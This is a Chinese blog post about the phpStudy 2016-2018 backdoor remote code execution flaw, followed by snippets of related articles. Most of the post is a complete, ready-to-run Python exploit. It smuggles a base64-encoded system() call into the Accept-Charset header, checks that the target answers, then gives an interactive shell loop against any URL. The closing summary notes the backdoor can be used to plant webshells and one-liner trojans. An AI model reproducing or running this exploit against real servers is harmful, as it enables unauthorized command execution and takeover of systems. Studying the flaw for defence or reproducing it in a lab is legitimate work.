phpStudy_2016-2018_RCE漏洞的检测利用脚本编写

最新推荐文章于 2024-07-31 10:58:10 发布
最新推荐文章于 2024-07-31 10:58:10 发布
阅读量610 收藏 3
点赞数
CC 4.0 BY-SA版权
文章标签: php python 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44801963/article/details/120441759
本文详细介绍了phpStudy_2016-2018版本中存在的RCE漏洞,包括漏洞原理和EXP脚本的编写。作者提供了一个用于检测目标是否在线以及执行任意命令的Python脚本,该脚本通过向目标提交特定的GET请求,触发phpSystem函数执行系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

本章主要针对phpStudy_2016_2018_RCE 漏洞编写EXP,复现该漏洞利用过程。文中内容涉及技术仅供个人学习参考。

关于phpStudy_2016_2018_RCE 漏洞的详细介绍参考:https://editor.csdn.net/md/?articleId=120443475

一、phpStudy_2016-2018存在什么漏洞

phpStudy_2016-2018中存在RCE(remote command/code execute)远程指令执行漏洞,即攻击者可以远程控制目标执行任意指令。

二、EXP脚本编写

1.目标存活检测

代码如下:

def judge():
    j = ''
    for i in range(18):
        j +=random.choice(string.digits + string.ascii_letters)
    return j
#初始化
def main(url):
    flag1 = judge()
    cmd = "echo " + flag1
    flag2 = rce(url, cmd)
    if  flag1 in flag2 :
       print("[+] Target is enable!")
       while True:
            cmd = input("[*] cmd >")
            if cmd == "q" or cmd == "":
                break
            print(rce(url, cmd))
    else:
        print("[+] Target is not  enable! exit 3s later")
        sleep(3)
        exit()

2.漏洞触发

代码如下:

#向目标提交请求,漏洞触发。
def rce(url,cmd):
    cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode()
    headers = {
            'Accept-Charset': cmd,#请求头中提交参数,触发漏洞。
            'Accept-Encoding':'gzip,deflate',#请求头中提交参数,触发漏洞。
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284'
    } #浏览器指纹
    res = requests.get(url = url ,headers=headers)
    print(res.status_code)
    if res.status_code == 200:        #判断是否能与目标正常通信
        bof = 0
        eof = res.content.index(b"<!DOCTYPE html")  #将回复内容转化为二进制字符
        k = (res.content[bof:eof].decode("gbk"))
        return k
    else:
        exit("error url!")

3.完整代码

代码如下:

'''
author : meark 
date : 2021-9-16
message : phpstudy
information :phpstudy RCE漏洞利用复现
'''
import requests
import base64
import string
import random
from time import sleep
#向目标提交请求,漏洞触发。
def rce(url,cmd):
    cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode()
    headers = {
            'Accept-Charset': cmd,#请求头中提交参数,触发漏洞。
            'Accept-Encoding':'gzip,deflate',#请求头中提交参数,触发漏洞。
            'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284'
    } #浏览器指纹
    res = requests.get(url = url ,headers=headers)
    print(res.status_code)
    if res.status_code == 200:        #判断是否能与目标正常通信
        bof = 0
        eof = res.content.index(b"<!DOCTYPE html")  #将回复内容转化为二进制字符
        k = (res.content[bof:eof].decode("gbk"))
        return k
    else:
        exit("error url!")
# 生成随机数与目标返回的字符对比,判断目标是否在线。
def judge():
    j = ''
    for i in range(18):
        j +=random.choice(string.digits + string.ascii_letters)
    return j
#初始化
def main(url):
    flag1 = judge()
    cmd = "echo " + flag1
    flag2 = rce(url, cmd)
    if  flag1 in flag2 :
       print("[+] Target is enable!")
       while True:
            cmd = input("[*] cmd >")
            if cmd == "q" or cmd == "":
                break
            print(rce(url, cmd))
    else:
        print("[+] Target is not  enable! exit 3s later")
        sleep(3)
        exit()

if __name__ == "__main__":
    url = input("Enter an url :")
    print("[+] Testing url:{}".format(url))
    print('-----------------')
    main(url)

总结

2016和2018版本的phpstudy被植入后门后,通过向目标提交GET请求,可以调用php system函数执行系统命令。也可以通过system函数在目标本地生成webshell、一句话木马等。

for.better
关注
phpstudy RCE脚本编写Python
m0_56578216的博客
09-21 408
如果想执行由用户输入的任意代码,就要用base64模块给命令做编码,并添加一个cmd变量,替换Accept-Charset的内容,下面以whoami为例:
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 1006
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的.
phpstudy_rce.py
10-11
phpstudy_rce
phpstudy_2016-2018_rce
qq_58683895的博客
11-03 247
phpstudy_2016-2018_rce漏洞攻击脚本
phpstudy_2016-2018_rce_backdoor漏洞复现
weixin_46365325的博客
07-31 882
PHP study 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、Mysql、PhpMyAdmin 等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。攻击者可以利用漏洞执行 PHP 命令,也可以称作 phpstudy 后门。模块中,至少有2个版本:phpStudy2016phpstudy 2018自带的php-5.2.17、php-5.4.45。使用bp编码后进行上传,在网页查看是否上传成功,使用蚁剑进行连接。更改 bp 字体为楷体24pt。
phpStudy_2016-2018_RCE漏洞复现
weixin_44801963的博客
09-24 1695
文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析总结 前言 phpstudy漏洞在当时的影响还是蛮大的,所以决定对phpstudy存在的漏洞进行解析复现。 一、phpStudy_2016-2018_RCE是什么 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中20162018版本的phpstudy存在被黑客恶
phpstudy_2016-2018_rce 漏洞复现及深度利用
m0_67189356的博客
04-16 5684
说明 内容 漏洞编号 phpstudy_2016-2018_rce 漏洞名称 RCE(Remote Command|Code Execute) 漏洞评级 高危 影响范围 phpStudy 2016 phpStudy 2018 漏洞描述 攻击者可以利用漏洞执行PHP 命令,也可以称作 phpStudy 后门 。 漏洞描述 攻击者可以利用漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code E
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6218
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
小皮(Phpstudy)面板存在任意命令执行漏洞-公开版本
04-20
漏洞最早由渊龙Sec安全团队在春节期间发现,经过深入研究,确认了小皮Phpstudy面板存在多处安全隐患,包括但不限于未授权访问、跨站脚本(XSS)、任意文件上传与写入以及远程命令执行(RCE)等。整体来看,这些漏洞的...
23-命令执行漏洞(一)
XLbb的博客
05-15 852
环境准备:虚拟机windows2003 phpstudy2016 pikachu、dvwa靶场环境 bp。
PHP脚本漏洞扫描器
06-19
PHP脚本漏洞扫描器 一个脚本漏洞扫描器 自动
Php漏洞扫描器
12-19
Php漏洞扫描器
phpstudy_2016-2018_rce_py脚本_布尔盲注脚本_延时注入脚本_布尔盲注脚本
weixin_42786460的博客
09-25 861
phpstudy_2016-2018_rce_py脚本_布尔盲注脚本_延时注入脚本_布尔盲注脚本
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 692
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016PHP5.4存在后门。实际测试官网下载phpstudy2018php-5.2....
PhpStudy2016-2018-RCE 漏洞复现
故事讲予风听
07-14 1633
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpstudy使用fcgid脚本映射实现php多版本共存
赵一舟的博客
01-27 2852
如果使用phpStudy_2016.11.03已经开启了fcgid的就不需要这步操作,没有开启需要fcgid修改httpd.conf最底部增加如下: LoadModule fcgid_module modules/mod_fcgid.so AddHandler fcgid-script .fcgi .php Include conf/extra/httpd-php-fcgid53.conf
phpstudy漏洞
qq_17054659的博客
01-11 6607
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1808
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
poc-yaml-phpstudy-backdoor-rce20182016的文件目录
最新发布
04-01
name: poc-yaml-phpstudy-backdoor-rce rules: - method: GET path: /index.php headers: Accept-Encoding: 'gzip,deflate' Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw== follow_redirects: false ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值